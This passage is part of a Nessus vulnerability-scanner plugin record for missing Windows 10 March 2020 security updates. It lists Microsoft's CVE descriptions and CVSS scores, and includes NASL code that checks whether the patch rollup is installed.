The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. 
An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. 
(CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when\n Windows Defender Security Center handles certain objects\n in memory. (CVE-2020-0762, CVE-2020-0763)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. 
(CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. 
The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when \n Chakra improperly discloses the contents of its memory, \n which could provide an attacker with information to \n further compromise the user's computer or data. \n (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. 
An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323, \n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4540689/windows-10-update-kb4540689\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?579abf8f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540689.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540689');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n 
rollup_kb_list:[4540689])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:27:52", "description": "The remote Windows host is missing security update 4540673.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-0854)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. 
(CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An information vulnerability exists when Windows Connected User Experiences and Telemetry Service improperly discloses file information. Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0863)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0876)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. 
An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. (CVE-2020-0762, CVE-2020-0763)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. 
(CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811, CVE-2020-0812)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540673: Windows 10 Version 1903 and Windows 10 Version 1909 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0762", "CVE-2020-0763", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0807", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0812", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0825", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0854", 
"CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0863", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0876", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540673.NASL", "href": "https://www.tenable.com/plugins/nessus/134370", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134370);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0762\",\n \"CVE-2020-0763\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n 